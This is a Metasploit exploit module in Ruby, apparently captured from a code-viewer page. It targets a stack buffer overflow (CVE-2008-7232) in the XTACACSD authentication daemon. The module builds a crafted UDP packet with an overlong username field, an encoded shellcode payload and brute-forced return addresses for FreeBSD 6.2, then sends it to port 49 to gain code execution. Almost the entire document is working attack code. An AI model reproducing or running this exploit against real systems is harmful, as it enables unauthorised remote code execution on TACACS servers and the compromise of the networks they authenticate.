Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Udp
10
  include Msf::Exploit::Brute
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'XTACACSD report() Buffer Overflow',
15
      'Description'    => %q{
16
          This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By
17
        sending a specially crafted XTACACS packet with an overly long
18
        username, an attacker may be able to execute arbitrary code.
19
      },
20
      'Author'         => 'MC',
21
      'References'     =>
22
        [
23
          ['CVE', '2008-7232'],
24
          ['OSVDB', '58140'],
25
          ['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],
26
        ],
27
      'Payload'        =>
28
        {
29
          'Space'    => 175,
30
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
31
          'StackAdjustment' => -3500,
32
          'PrependEncoder' => "\x83\xec\x7f",
33
          'DisableNops'   =>  'True',
34
        },
35
      'Platform'       => 'bsd',
36
      'Arch'           => ARCH_X86,
37
      'Targets'        =>
38
        [
39
          ['FreeBSD 6.2-Release Bruteforce',
40
            {'Bruteforce' =>
41
              {
42
                'Start' => { 'Ret' => 0xbfbfea00 },
43
                'Stop'  => { 'Ret' => 0xbfbfef00 },
44
                'Step'  => 24,
45
              }
46
            },
47
          ],
48
        ],
49
      'Privileged'     => true,
50
      'DefaultTarget'  => 0,
51
      'DisclosureDate' => '2008-01-08'))
52

53
    register_options([Opt::RPORT(49)])
54
  end
55

56
  def brute_exploit(address)
57
    connect_udp
58

59
    sploit =  "\x80" # Version
60
    sploit << "\x05" # Type: Connect
61
    sploit << "\xff\xff" # Nonce
62
    sploit << "\xff" # Username length
63
    sploit << "\x00" # Password length
64
    sploit << "\x00" # Response
65
    sploit << "\x00" # Reason
66
    sploit << "\xff\xff\xff\xff" # Result 1
67
    sploit << "\xff\xff\xff\xff" # Destination address
68
    sploit << "\xff\xff" # Destination port
69
    sploit << "\xff\xff" # Line
70
    sploit << "\x00\x00\x00\x00" # Result 2
71
    sploit << "\x00\x00" # Result 3
72
    sploit << make_nops(238 - payload.encoded.length)
73
    sploit << payload.encoded + [address['Ret']].pack('V')
74

75
    print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
76
    udp_sock.put(sploit)
77

78
    disconnect_udp
79
  end
80
end
81

82